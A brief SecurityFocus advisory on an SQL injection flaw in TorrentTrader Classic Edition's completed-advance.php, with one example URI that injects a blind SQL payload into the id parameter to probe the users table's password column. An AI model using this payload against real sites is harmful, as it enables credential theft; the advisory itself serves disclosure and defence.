TorrentTrader Classic Edition 'completed-advance.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/tracker/completed-advance.php?id=180+AND ascii(SUBSTRING((SELECT Count(password) FROM users LIMIT 1,1)1,1)


 

Privacy Statement
Copyright 2010, SecurityFocus